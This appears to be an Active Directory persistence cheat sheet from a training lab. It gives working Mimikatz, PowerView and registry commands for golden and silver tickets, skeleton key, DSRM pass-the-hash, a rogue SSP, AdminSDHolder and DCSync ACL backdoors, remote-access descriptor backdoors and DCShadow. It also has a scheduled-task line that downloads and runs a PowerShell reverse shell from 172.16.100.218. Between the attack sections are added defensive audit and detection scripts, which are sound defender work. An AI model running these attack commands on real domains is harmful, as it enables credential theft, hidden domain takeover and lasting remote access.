Persistence

Golden Ticket

# Run as DA locally on DC to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

# Run remotely as DA to get krbtgt hash:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

# Get domain SID:
Get-DomainSID

# Get domain ticket policy:
(Get-DomainPolicy)."kerberos.policy"

# Create ticket:
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

# Use ticket:
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

# Access:
ls \\domain-dc\c$
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\Administrator /domain:DOMAIN"'

Silver Ticket

# Using DC$ hash to provide access to domain shares on DC:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN /sid:S-1-5-21-1874506631-3219952063-538504511 /target:DC.DOMAIN.local /service:CIFS /rc4:HASH /user:Administrator /ptt"'

# Create ticket for HOST (using DC$ hash) to allow us to schedule tasks on target:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:HOST /rc4:HASH /user:Administrator /ptt"'

## Schedule task with above silver ticket
schtasks /create /S dc.DOMAIN.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User" /TR "powershell iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443"
schtasks /Run /S dc.DOMAIN.local /TN "User"

# To execute WMI, need both HOST and RPCSS tickets:
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:RPCSS /rc4:HASH /user:Administrator /ptt"'
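Defender-side counterpart to the golden and silver ticket sections above. This is an added example, not part of the original notes or of any tool named here; it runs elevated on a domain controller that audits Kerberos service ticket operations. The 4769 EventData field names are the standard ones; the function names, the krbtgt age report and the account-existence check are this script's own assumptions.

```powershell
# Added example (not from the original notes): hunting artifacts of forged Kerberos
# tickets on a DC. Requires the ActiveDirectory module and read access to the
# Security log.
Import-Module ActiveDirectory

# 1. Golden ticket exposure. A forged TGT stays valid until krbtgt has been reset
#    twice (both passwords in its history rotated), so the age of the current
#    krbtgt secret bounds how long an old key theft keeps working.
function Get-KrbtgtAge {
    $k = Get-ADUser -Identity krbtgt -Properties PasswordLastSet
    [pscustomobject]@{
        Account         = $k.SamAccountName
        PasswordLastSet = $k.PasswordLastSet
        AgeDays         = [int](New-TimeSpan -Start $k.PasswordLastSet -End (Get-Date)).TotalDays
    }
}

# 2. Tickets forged from an NT hash (/krbtgt:HASH, /rc4:HASH in the notes above) are
#    RC4-HMAC, i.e. TicketEncryptionType 0x17 in event 4769. Where accounts are
#    AES-enabled, RC4 service tickets for CIFS/HOST/RPCSS on a DC stand out, and a
#    TargetUserName that does not resolve to a real account points at a fabricated
#    principal inside a forged ticket.
function Find-Rc4ServiceTickets {
    param([int]$MaxEvents = 1000)
    $xpath  = "*[System[EventID=4769] and EventData[Data[@Name='TicketEncryptionType']='0x17']]"
    $events = Get-WinEvent -LogName Security -FilterXPath $xpath -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Pull the named EventData fields out of the event XML.
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        # Strip the @REALM suffix and check the account actually exists in AD.
        $sam    = ($data['TargetUserName'] -split '@')[0]
        $exists = [bool](Get-ADUser -LDAPFilter "(sAMAccountName=$sam)" -ErrorAction SilentlyContinue)

        [pscustomobject]@{
            Time          = $e.TimeCreated
            User          = $data['TargetUserName']
            AccountExists = $exists
            Service       = $data['ServiceName']      # e.g. DC$ for CIFS/HOST/RPCSS on the DC
            Client        = $data['IpAddress']
            EncType       = $data['TicketEncryptionType']
        }
    }
}

Get-KrbtgtAge
Find-Rc4ServiceTickets | Sort-Object AccountExists, Time | Format-Table -AutoSize
```

Rows with AccountExists = False deserve first attention; RC4 tickets for real accounts still need a baseline, since legacy applications and accounts without AES keys produce them legitimately. The silver ticket variants never touch the KDC after the forged TGS is used, so on the target host the only trace is the resulting 4624 logon, which makes the DC-side 4769 view above mainly useful for the golden ticket case and for RC4 tickets that were requested normally.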

Skeleton Key

# Creating skeleton key
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.DOMAIN.local

# Using skeleton key (password is "mimikatz")
Enter-PSSession -ComputerName dc -Credential DOMAIN\Administrator

DSRM (Directory Services Restore Mode)

The DSRM password is set when a DC is promoted and is the DC's local Administrator password. By making a registry change, it is possible to use the DSRM hash in a pass-the-hash attack. This gives DA with a password that is very unlikely to change.

# Dump DSRM passwords (requires DA):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dc

# Change registry:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Pass the DSRM hash:
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc /user:Administrator /ntlm:HASH /run:powershell.exe"'
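The registry value above is the durable artifact of this technique, so it is also the thing to audit. The script below is an added example, not part of the original notes: it reads DsrmAdminLogonBehavior from every DC in the domain over PowerShell remoting and explains each value. The -Remediate switch is this script's own convention, not a parameter of any Microsoft cmdlet.

```powershell
# Added example (not from the original notes): audit every DC for the
# DsrmAdminLogonBehavior value that the notes above set to 2.
#   absent / 0 : default, DSRM account usable only when booted into DSRM
#   1          : usable when the AD DS service is stopped
#   2          : usable at any time, including over the network (persistence indicator)
param([switch]$Remediate)

Import-Module ActiveDirectory
$key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$name = 'DsrmAdminLogonBehavior'
$dcs  = (Get-ADDomainController -Filter *).HostName

Invoke-Command -ComputerName $dcs -ArgumentList $key, $name, $Remediate.IsPresent -ScriptBlock {
    param($key, $name, $fix)
    $value = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name

    # switch does not enter any case for $null input, so handle "not set" first.
    if ($null -eq $value) {
        $status = 'Default (not set)'
    } else {
        $status = switch ([int]$value) {
            0       { 'Default (0)' }
            1       { 'Allowed while AD DS is stopped (1)' }
            2       { 'ALLOWED AT ANY TIME (2) - persistence indicator' }
            default { "Unexpected value $value" }
        }
    }

    # Removing the value restores the default behaviour (same as 0).
    if ($fix -and $null -ne $value -and [int]$value -ne 0) {
        Remove-ItemProperty -Path $key -Name $name
        $status += ' -> removed'
    }

    [pscustomobject]@{ DC = $env:COMPUTERNAME; Value = $value; Status = $status }
} | Select-Object DC, Value, Status
```

Run it from a workstation with the RSAT ActiveDirectory module as an account that can remote to the DCs; pair the audit with a SACL on the Lsa key so that a change to this value generates event 4657 at the moment it happens rather than at the next scheduled check.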

Custom SSP

A Security Support Provider (SSP) is a DLL that provides ways for an application to obtain an authenticated connection. Some SSP packages from Microsoft are NTLM, Kerberos, WDigest and CredSSP. Mimikatz provides a custom SSP, mimilib.dll, which logs local logons, service account and machine account passwords in clear text on the target server.

Drop mimilib.dll into system32 and add mimilib to the 'Security Packages' value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa:
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

# Using mimikatz, inject into LSASS without touching the registry (not stable on Server 2016):
Invoke-Mimikatz -Command '"misc::memssp"'

# All logons are now also logged in clear text to:
C:\Windows\system32\kiwissp.log
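Both variants above leave something checkable: the registry variant changes the 'Security Packages' values, the memssp variant leaves code in LSASS, and both write kiwissp.log. The following audit script is an added example, not part of the original notes; $KnownPackages is an assumed baseline of the packages a default Windows install lists, and should be diffed against a clean reference build of your own before its verdicts are trusted.

```powershell
# Added example (not from the original notes): audit a host for a rogue SSP.
# Run elevated. On hosts where LSASS runs as a protected process (RunAsPPL),
# module enumeration may be denied; the registry and log checks still work.
$KnownPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u', 'cloudap')   # assumed baseline

function Test-SecurityPackages {
    $paths = @(
        'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa',
        'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig'
    )
    foreach ($p in $paths) {
        $pkgs = (Get-ItemProperty -Path $p -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($pkg in @($pkgs)) {
            # The default value under \Lsa is a literal "" entry; skip empties.
            $n = $pkg.Trim('"').ToLower()
            if ($n -eq '') { continue }
            [pscustomobject]@{ Check = 'Registry'; Source = $p; Item = $pkg; Suspicious = ($KnownPackages -notcontains $n) }
        }
    }
}

function Test-LsassModules {
    # Any DLL inside LSASS that is not validly Microsoft-signed is worth explaining.
    $lsass = Get-Process -Name lsass -ErrorAction SilentlyContinue
    foreach ($m in @($lsass.Modules)) {
        $sig = Get-AuthenticodeSignature -FilePath $m.FileName
        $ok  = ($sig.Status -eq 'Valid') -and ($sig.SignerCertificate.Subject -like '*Microsoft*')
        if (-not $ok) {
            [pscustomobject]@{ Check = 'LSASS module'; Source = $m.FileName; Item = $sig.Status; Suspicious = $true }
        }
    }
}

function Test-KiwiLog {
    # Default drop path of the mimilib SSP log.
    $log = Join-Path $env:SystemRoot 'System32\kiwissp.log'
    $present = Test-Path -Path $log
    [pscustomobject]@{ Check = 'Log file'; Source = $log; Item = $present; Suspicious = $present }
}

Test-SecurityPackages
Test-LsassModules
Test-KiwiLog
```

The registry check only catches the persistent variant; memssp patches LSASS in memory and the registry stays clean, which is why the module signature check and the log file check are included alongside it. A package that is registered but whose DLL is absent from system32 still shows up here, and a SACL on the two Lsa keys turns the next modification into a 4657 event.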

ACL Abuse - AdminSDHolder

AdminSDHolder resides in the System container of a domain and is used to control the permissions, via its ACL, of certain built-in privileged groups (called Protected Groups). Its ACL is propagated across AD every hour by SDProp.

PowerView
# Giving a user full rights over AdminSDHolder groups:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose

# Giving user reset password rights:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose

# Giving user WriteMembers rights:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose

# Check Domain Admins permissions as normal user:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}

# Abuse FullControl (powerview_dev):
Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose

# Abuse ResetPassword (powerview_dev):
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

# Add DCSync rights to a user:
Add-ObjectAcl -TargetDistinguishedName 'DC=DOMAIN,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose
ADModule
# Giving a user full rights over AdminSDHolder groups:
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -Verbose

# Check Domain Admins permissions as normal user:
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}

# Abuse FullControl:
Add-ADGroupMember -Identity 'Domain Admins' -Members testda

# Abuse ResetPassword:
Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose

# Add DCSync rights:
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -GUIDRight DCSync -Verbose

# Run SDProp manually using Invoke-SDPropagator.ps1:
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

# For pre-Server 2008 machines:
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose
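The two ACLs modified in this section are also the two places a defender should read back. The script below is an added example, not part of the original notes or of PowerView: it lists every trustee on AdminSDHolder that is not in an assumed baseline of default principals ($BaselineTrustees is this script's assumption, to be verified against a clean reference domain), and every principal on the domain head holding the replication extended rights that make DCSync work. The three replication GUIDs are the documented values of those extended rights.

```powershell
# Added example (not from the original notes): audit AdminSDHolder and the domain
# head for the ACEs that the Add-ObjectAcl / Set-ADACL commands above leave behind.
Import-Module ActiveDirectory
$domain = Get-ADDomain

# Assumed baseline of trustees present on AdminSDHolder in a default domain.
$BaselineTrustees = @(
    'SYSTEM', 'Authenticated Users', 'SELF', 'Everyone', 'Administrators',
    'Pre-Windows 2000 Compatible Access', 'Terminal Server License Servers',
    'Windows Authorization Access Group', 'Domain Admins', 'Enterprise Admins',
    'Cert Publishers', 'ENTERPRISE DOMAIN CONTROLLERS'
)
function Get-TrusteeName([string]$identity) { ($identity -split '\\')[-1] }

# 1. AdminSDHolder: every ACE, flagged when its trustee is outside the baseline.
#    Because SDProp copies this ACL onto all Protected Groups hourly, one stray
#    ACE here becomes rights over Domain Admins and friends within the hour.
function Find-AdminSDHolderChanges {
    $path = "AD:\CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)"
    foreach ($ace in (Get-Acl -Path $path).Access) {
        [pscustomobject]@{
            Trustee    = $ace.IdentityReference.Value
            Rights     = $ace.ActiveDirectoryRights
            Type       = $ace.AccessControlType
            Unexpected = $BaselineTrustees -notcontains (Get-TrusteeName $ace.IdentityReference.Value)
        }
    }
}

# 2. DCSync: replication extended rights on the domain head. Domain controllers and
#    the admin groups hold them by default; anyone else is a persistence path.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    '00000000-0000-0000-0000-000000000000' = 'All extended rights'
}
$ExpectedDcsyncHolders = @('Domain Controllers', 'ENTERPRISE DOMAIN CONTROLLERS', 'Administrators',
                           'Domain Admins', 'Enterprise Admins', 'SYSTEM')

function Find-DcsyncHolders {
    $extRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $allRight = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    foreach ($ace in (Get-Acl -Path "AD:\$($domain.DistinguishedName)").Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $guid   = $ace.ObjectType.ToString()
        $isRepl = $ace.ActiveDirectoryRights.HasFlag($extRight) -and $ReplicationRights.ContainsKey($guid)
        $isAll  = $ace.ActiveDirectoryRights.HasFlag($allRight)   # GenericAll implies every extended right
        if (-not ($isRepl -or $isAll)) { continue }
        $right = 'GenericAll'
        if ($isRepl) { $right = $ReplicationRights[$guid] }
        [pscustomobject]@{
            Trustee    = $ace.IdentityReference.Value
            Right      = $right
            Unexpected = $ExpectedDcsyncHolders -notcontains (Get-TrusteeName $ace.IdentityReference.Value)
        }
    }
}

Find-AdminSDHolderChanges | Format-Table -AutoSize
Find-DcsyncHolders | Format-Table -AutoSize
```

Expect legitimate extra entries on the domain head in environments running Azure AD Connect or Exchange; the point is to know each one. Note that a DCSync right granted through an ACE on the domain head is independent of group membership, so it survives the removal of the user from every privileged group, which is exactly why it is used for persistence.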

ACL Abuse - Security Descriptors

It is possible to modify the Security Descriptors (security information such as owner, primary group, DACL and SACL) of several remote access methods (securable objects) to allow access to non-admin users. This is rarely checked.

WMI
# On local machine for student1:
Set-RemoteWMI -UserName student1 -Verbose

# On remote machine for student1 without explicit credentials:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose

# On remote machine, remove the permissions:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Remove -Verbose
PSRemote
# On local machine for student1:
Set-RemotePSRemoting -UserName student1 -Verbose

# On remote machine for student1 without credentials:
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Verbose

# On remote machine, remove the permissions:
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Remove
Remote Registry
# Using DAMP, with admin privs on remote machine:
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose

# As student1, retrieve machine account hash:
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve local account hash:
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

# Retrieve domain cached credentials:
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
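Since these descriptors are "rarely checked", the added example below reads all three back from a host and flags trustees outside an assumed set of normal administrative principals. It is not part of the original notes or of the DAMP or RACE tooling; $ExpectedTrustees is this script's assumption, and the checks run over PowerShell remoting against $ComputerName (default: the local machine).

```powershell
# Added example (not from the original notes): who can use WMI (root\cimv2), the
# default PSRemoting endpoint, and the Remote Registry pipe on a host. Run elevated.
param([string]$ComputerName = $env:COMPUTERNAME)

# Assumed baseline of trustees that normally appear on these objects.
$ExpectedTrustees = @('Administrators', 'SYSTEM', 'LOCAL SERVICE', 'NETWORK SERVICE',
                      'Remote Management Users', 'INTERACTIVE', 'Backup Operators')

$checks = {
    param($expected)
    function Test-Unexpected([string]$trustee) { $expected -notcontains (($trustee -split '\\')[-1]) }

    # 1. WMI namespace DACL for root\cimv2 (the namespace Set-RemoteWMI targets).
    $sd = (Invoke-CimMethod -Namespace 'root\cimv2' -ClassName '__SystemSecurity' -MethodName 'GetSecurityDescriptor').Descriptor
    foreach ($ace in @($sd.DACL)) {
        $trustee = "$($ace.Trustee.Domain)\$($ace.Trustee.Name)"
        [pscustomobject]@{
            Object = 'WMI root\cimv2'; Trustee = $trustee
            Access = ('0x{0:X} (AceType {1})' -f $ace.AccessMask, $ace.AceType)
            Unexpected = Test-Unexpected $trustee
        }
    }

    # 2. PSRemoting endpoint. Permission is a string like
    #    'BUILTIN\Administrators AccessAllowed, BUILTIN\Remote Management Users AccessAllowed'.
    $perm = (Get-PSSessionConfiguration -Name 'Microsoft.PowerShell').Permission
    foreach ($entry in ($perm -split ',\s*')) {
        if ($entry -match '^(?<trustee>.+?)\s+(?<kind>Access(Allowed|Denied))$') {
            [pscustomobject]@{
                Object = 'PSRemoting Microsoft.PowerShell'; Trustee = $Matches.trustee
                Access = $Matches.kind; Unexpected = Test-Unexpected $Matches.trustee
            }
        }
    }

    # 3. Remote Registry: the winreg key governs who may open the remote registry
    #    service at all. (Add-RemoteRegBackdoor additionally changes ACLs on the
    #    SAM/SECURITY hive keys, whose ACLs need SYSTEM to read; not covered here.)
    $acl = Get-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg'
    foreach ($a in $acl.Access) {
        [pscustomobject]@{
            Object = 'winreg key'; Trustee = $a.IdentityReference.Value
            Access = $a.RegistryRights; Unexpected = Test-Unexpected $a.IdentityReference.Value
        }
    }
}

Invoke-Command -ComputerName $ComputerName -ScriptBlock $checks -ArgumentList (,$ExpectedTrustees) |
    Select-Object Object, Trustee, Access, Unexpected |
    Format-Table -AutoSize
```

Run it across the domain controllers first, since that is where the examples above aim; an individual user principal on any of these three objects has no legitimate reason to be there and is the signature of this technique.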

DCShadow - Forest Persistence

The machine needs to be joined to the parent domain; this can be changed in System Properties with admin access and requires a computer restart. The user must also be a valid user in that domain, so they may need to be added first.

Requires 2 consoles. One as DA, one as SYSTEM. SYSTEM sets up the fake DC, DA pushes the replication.

# Setting up fake DC (SYSTEM console)
.\mimikatz.exe
mimikatz# !+
mimikatz# !processtoken
mimikatz# lsadump::dcshadow /object:targetuser /attribute:serviceprincipalname /value:uniquespn/DC1

# On DA console, push the replication
mimikatz -command '"lsadump::dcshadow /push"'

Allowing DCShadow to a user so they can do it without DA privileges, for persistence. Once done, the user can run the /push console without DA; the first console still needs SYSTEM privileges.

Set-DCShadowPermissions -FakeDC USER -SAMAccountName USER -Username studentx -Verbose
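A DCShadow push works by registering the attacker's machine as a domain controller for the duration of the replication: it temporarily acquires the SPNs only DCs carry and an nTDSDSA object under the Sites container, and the real DCs log the replication from it. The script below is an added example, not part of the original notes or of mimikatz, and looks for those artifacts across the forest; the SPN prefix and GUID are the documented DC SPN forms, and the event IDs are standard replication audits. Function names and the regex used to pull the server name out of a DN are this script's own.

```powershell
# Added example (not from the original notes): rogue-DC artifacts left by DCShadow.
Import-Module ActiveDirectory

# Real DCs of every domain in the forest (DCShadow here is used for forest persistence).
$realDCs = foreach ($d in (Get-ADForest).Domains) { (Get-ADDomainController -Filter * -Server $d).Name }

# 1. Computer objects with DC-only SPNs ('GC/...' and the DRS RPC interface GUID)
#    that are not known domain controllers.
function Find-ComputersWithDcSpns {
    $drsGuid = 'E3514235-4B06-11D1-AB04-00C04FC2DCD2'
    Get-ADComputer -LDAPFilter "(|(servicePrincipalName=GC/*)(servicePrincipalName=$drsGuid/*))" -Properties servicePrincipalName |
        Where-Object { $realDCs -notcontains $_.Name } |
        ForEach-Object {
            [pscustomobject]@{ Check = 'DC SPN on non-DC'; Object = $_.Name; Detail = ($_.servicePrincipalName -join '; ') }
        }
}

# DN of an NTDS Settings object is 'CN=NTDS Settings,CN=<server>,CN=Servers,CN=<site>,...'.
function Get-ServerFromNtdsDn([string]$dn) { $dn -replace '^CN=NTDS Settings,CN=([^,]+),.*$', '$1' }

# 2. nTDSDSA objects under the configuration partition whose server is not a real DC.
function Find-RogueNtdsdsa {
    $configNC = (Get-ADRootDSE).configurationNamingContext
    Get-ADObject -SearchBase "CN=Sites,$configNC" -LDAPFilter '(objectClass=nTDSDSA)' |
        ForEach-Object {
            $server = Get-ServerFromNtdsDn $_.DistinguishedName
            if ($realDCs -notcontains $server) {
                [pscustomobject]@{ Check = 'Rogue nTDSDSA'; Object = $server; Detail = $_.DistinguishedName }
            }
        }
}

# 3. Replication audit events on this DC: 4928 (source naming context established)
#    and 4929 (source naming context removed). A pushed DCShadow creates and then
#    tears down a replication source, so the SourceDRA shows the rogue machine
#    even after the objects above have been cleaned up.
function Find-ReplicationFromNonDc {
    param([int]$MaxEvents = 500)
    $xpath = "*[System[(EventID=4928 or EventID=4929)]]"
    Get-WinEvent -LogName Security -FilterXPath $xpath -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            $source = Get-ServerFromNtdsDn $data['SourceDRA']
            if ($realDCs -notcontains $source) {
                [pscustomobject]@{ Check = "Event $($_.Id)"; Object = $source; Detail = "$($_.TimeCreated) NC=$($data['NamingContext'])" }
            }
        }
}

Find-ComputersWithDcSpns
Find-RogueNtdsdsa
Find-ReplicationFromNonDc
```

The first two checks only catch a DCShadow that was left registered or interrupted, since mimikatz unregisters the fake DC after a successful push; the 4928/4929 pair on the real DCs is the durable record. Event 4742 (computer account changed) for the attacker's machine, showing the GC/ SPN being added and removed, is the other side of the same story.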